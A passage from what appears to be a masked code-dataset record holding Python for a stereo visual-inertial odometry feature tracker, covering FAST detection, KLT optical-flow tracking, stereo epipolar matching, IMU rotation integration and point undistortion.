after_ransac += 1\n self.num_features['after_ransac'] = after_ransac\n\n def add_new_features(self):\n \"\"\"\n Detect new features on the image to ensure that the features are \n uniformly distributed on the image.\n \"\"\"\n curr_img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(curr_img)\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\n for feature in chain.from_iterable(self.curr_features):\n x, y = map(int, feature.cam0_point)\n mask[y - 3:y + 4, x - 3:x + 4] = 0\n new_features = self.detector.detect(curr_img, mask=mask)\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\n for feature in new_features:\n row = int(feature.pt[1] / grid_height)\n col = int(feature.pt[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature_sieve[code].append(feature)\n new_features = []\n for features in new_feature_sieve:\n if len(features) > self.config.grid_max_feature_num:\n features = sorted(features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_max_feature_num]\n new_features.append(features)\n new_features = list(chain.from_iterable(new_features))\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def prune_features(self):\n \"\"\"\n Remove some of the features of a grid in case there are too many \n features inside of that grid, which ensures the number of features \n within each grid is bounded.\n \"\"\"\n for i, features in enumerate(self.curr_features):\n if len(features) <= self.config.grid_max_feature_num:\n continue\n self.curr_features[i] = sorted(features, key=lambda x: x.\n lifetime, reverse=True)[:self.config.grid_max_feature_num]\n\n def load_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\n self.image_id += 1\n\n def save_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n\n def publish(self):\n \"\"\"\n Publish the features on the current image including both the \n tracked and newly detected ones.\n \"\"\"\n curr_ids = []\n curr_cam0_points = []\n curr_cam1_points = []\n for feature in chain.from_iterable(self.curr_features):\n curr_ids.append(feature.id)\n curr_cam0_points.append(feature.cam0_point)\n curr_cam1_points.append(feature.cam1_point)\n curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,\n self.cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,\n self.cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n features = []\n for i in range(len(curr_ids)):\n fm = FeatureMeasurement()\n fm.id = curr_ids[i]\n fm.u0 = curr_cam0_points_undistorted[i][0]\n fm.v0 = curr_cam0_points_undistorted[i][1]\n fm.u1 = curr_cam1_points_undistorted[i][0]\n fm.v1 = curr_cam1_points_undistorted[i][1]\n features.append(fm)\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self\n .cam0_curr_img_msg.timestamp, features)\n return feature_msg\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\n epipolar_line[:2])\n if error > self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FeatureMeasurement(object):\n <mask token>\n\n def __init__(self):\n self.id = None\n self.u0 = None\n self.v0 = None\n self.u1 = None\n self.v1 = None\n\n\nclass ImageProcessor(object):\n \"\"\"\n Detect and track features in image sequences.\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n self.is_first_img = True\n self.next_feature_id = 0\n self.detector = cv2.FastFeatureDetector_create(self.config.\n fast_threshold)\n self.imu_msg_buffer = []\n self.cam0_prev_img_msg = None\n self.cam0_curr_img_msg = None\n self.cam1_curr_img_msg = None\n self.prev_cam0_pyramid = None\n self.curr_cam0_pyramid = None\n self.curr_cam1_pyramid = None\n self.prev_features = [[] for _ in range(self.config.grid_num)]\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n self.num_features = defaultdict(int)\n self.cam0_resolution = config.cam0_resolution\n self.cam0_intrinsics = config.cam0_intrinsics\n self.cam0_distortion_model = config.cam0_distortion_model\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs\n self.cam1_resolution = config.cam1_resolution\n self.cam1_intrinsics = config.cam1_intrinsics\n self.cam1_distortion_model = config.cam1_distortion_model\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\n self.image_id = 0\n\n def stereo_callback(self, stereo_msg):\n \"\"\"\n Callback function for the stereo images.\n \"\"\"\n start = time.time()\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\n self.create_image_pyramids()\n if self.is_first_img:\n if not self.config.load_features_flag:\n self.initialize_first_frame()\n self.is_first_img = False\n elif not self.config.load_features_flag:\n t = time.time()\n self.track_features()\n print('___track_features:', time.time() - t)\n t = time.time()\n self.add_new_features()\n print('___add_new_features:', time.time() - t)\n t = time.time()\n self.prune_features()\n print('___prune_features:', time.time() - t)\n t = time.time()\n print('___draw_features_stereo:', time.time() - t)\n t = time.time()\n print('===image process elapsed:', time.time() - start,\n f'({stereo_msg.timestamp})')\n if not self.config.load_features_flag:\n try:\n self.save_features()\n return self.publish()\n finally:\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\n self.prev_features = self.curr_features\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n else:\n self.load_features()\n return self.publish()\n\n def imu_callback(self, msg):\n \"\"\"\n Callback function for the imu message.\n \"\"\"\n self.imu_msg_buffer.append(msg)\n\n def create_image_pyramids(self):\n \"\"\"\n Create image pyramids used for KLT tracking.\n (Seems doesn't work in python)\n \"\"\"\n curr_cam0_img = self.cam0_curr_img_msg.image\n self.curr_cam0_pyramid = curr_cam0_img\n curr_cam1_img = self.cam1_curr_img_msg.image\n self.curr_cam1_pyramid = curr_cam1_img\n\n def initialize_first_frame(self):\n \"\"\"\n Initialize the image processing sequence, which is basically detect \n new features on the first set of stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n new_features = self.detector.detect(img)\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers = [], []\n response_inliers = []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def track_features(self):\n \"\"\"\n Tracker features on the newly received stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\n prev_ids = []\n prev_lifetime = []\n prev_cam0_points = []\n prev_cam1_points = []\n for feature in chain.from_iterable(self.prev_features):\n prev_ids.append(feature.id)\n prev_lifetime.append(feature.lifetime)\n prev_cam0_points.append(feature.cam0_point)\n prev_cam1_points.append(feature.cam1_point)\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\n self.num_features['before_tracking'] = len(prev_cam0_points)\n if len(prev_cam0_points) == 0:\n return\n curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,\n cam0_R_p_c, self.cam0_intrinsics)\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.\n prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.\n astype(np.float32), curr_cam0_points.astype(np.float32), **self\n .config.lk_params)\n for i, point in enumerate(curr_cam0_points):\n if not track_inliers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n track_inliers[i] = 0\n prev_tracked_ids = select(prev_ids, track_inliers)\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\n curr_cam1_points, match_inliers = self.stereo_match(\n curr_tracked_cam0_points)\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\n prev_matched_cam0_points = select(prev_tracked_cam0_points,\n match_inliers)\n prev_matched_cam1_points = select(prev_tracked_cam1_points,\n match_inliers)\n curr_matched_cam0_points = select(curr_tracked_cam0_points,\n match_inliers)\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\n after_ransac = 0\n for i in range(len(cam0_ransac_inliers)):\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\n continue\n row = int(curr_matched_cam0_points[i][1] / grid_height)\n col = int(curr_matched_cam0_points[i][0] / grid_width)\n code = row * self.config.grid_col + col\n grid_new_feature = FeatureMetaData()\n grid_new_feature.id = prev_matched_ids[i]\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\n prev_matched_lifetime[i] += 1\n self.curr_features[code].append(grid_new_feature)\n after_ransac += 1\n self.num_features['after_ransac'] = after_ransac\n\n def add_new_features(self):\n \"\"\"\n Detect new features on the image to ensure that the features are \n uniformly distributed on the image.\n \"\"\"\n curr_img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(curr_img)\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\n for feature in chain.from_iterable(self.curr_features):\n x, y = map(int, feature.cam0_point)\n mask[y - 3:y + 4, x - 3:x + 4] = 0\n new_features = self.detector.detect(curr_img, mask=mask)\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\n for feature in new_features:\n row = int(feature.pt[1] / grid_height)\n col = int(feature.pt[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature_sieve[code].append(feature)\n new_features = []\n for features in new_feature_sieve:\n if len(features) > self.config.grid_max_feature_num:\n features = sorted(features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_max_feature_num]\n new_features.append(features)\n new_features = list(chain.from_iterable(new_features))\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def prune_features(self):\n \"\"\"\n Remove some of the features of a grid in case there are too many \n features inside of that grid, which ensures the number of features \n within each grid is bounded.\n \"\"\"\n for i, features in enumerate(self.curr_features):\n if len(features) <= self.config.grid_max_feature_num:\n continue\n self.curr_features[i] = sorted(features, key=lambda x: x.\n lifetime, reverse=True)[:self.config.grid_max_feature_num]\n\n def load_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\n self.image_id += 1\n\n def save_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n\n def publish(self):\n \"\"\"\n Publish the features on the current image including both the \n tracked and newly detected ones.\n \"\"\"\n curr_ids = []\n curr_cam0_points = []\n curr_cam1_points = []\n for feature in chain.from_iterable(self.curr_features):\n curr_ids.append(feature.id)\n curr_cam0_points.append(feature.cam0_point)\n curr_cam1_points.append(feature.cam1_point)\n curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,\n self.cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,\n self.cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n features = []\n for i in range(len(curr_ids)):\n fm = FeatureMeasurement()\n fm.id = curr_ids[i]\n fm.u0 = curr_cam0_points_undistorted[i][0]\n fm.v0 = curr_cam0_points_undistorted[i][1]\n fm.u1 = curr_cam1_points_undistorted[i][0]\n fm.v1 = curr_cam1_points_undistorted[i][1]\n features.append(fm)\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self\n .cam0_curr_img_msg.timestamp, features)\n return feature_msg\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\n epipolar_line[:2])\n if error > self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, 